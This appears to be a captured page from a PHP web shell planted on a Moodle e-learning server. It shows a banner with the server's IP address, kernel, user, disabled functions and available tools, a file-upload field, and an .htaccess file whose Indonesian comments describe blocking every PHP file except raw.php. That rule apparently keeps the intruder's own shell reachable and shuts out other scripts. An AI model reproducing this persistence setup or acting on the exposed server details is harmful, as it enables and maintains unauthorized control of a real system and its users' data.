| Server IP : 41.63.0.143 / Your IP : 216.73.216.184 [ Web Server : Apache/2.4.29 (Ubuntu) System : Linux elearning 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 User : www-data ( 33) PHP Version : 7.2.24-0ubuntu0.18.04.17 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals, Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/moodle/local/moodle_webshell/lang/ |
Upload File : |
# ===========================
# .htaccess Protection
# ===========================
<IfModule mod_rewrite.c>
RewriteEngine On
# Izinkan raw.php dan raw.php
RewriteCond %{REQUEST_FILENAME} !raw\.php$ [NC]
RewriteCond %{REQUEST_FILENAME} !raw\.php$ [NC]
# Blok semua file PHP lainnya
RewriteRule \.(php|php5|php7|phar|phtml)$ - [F,L]
</IfModule>
# Cegah directory listing
Options -Indexes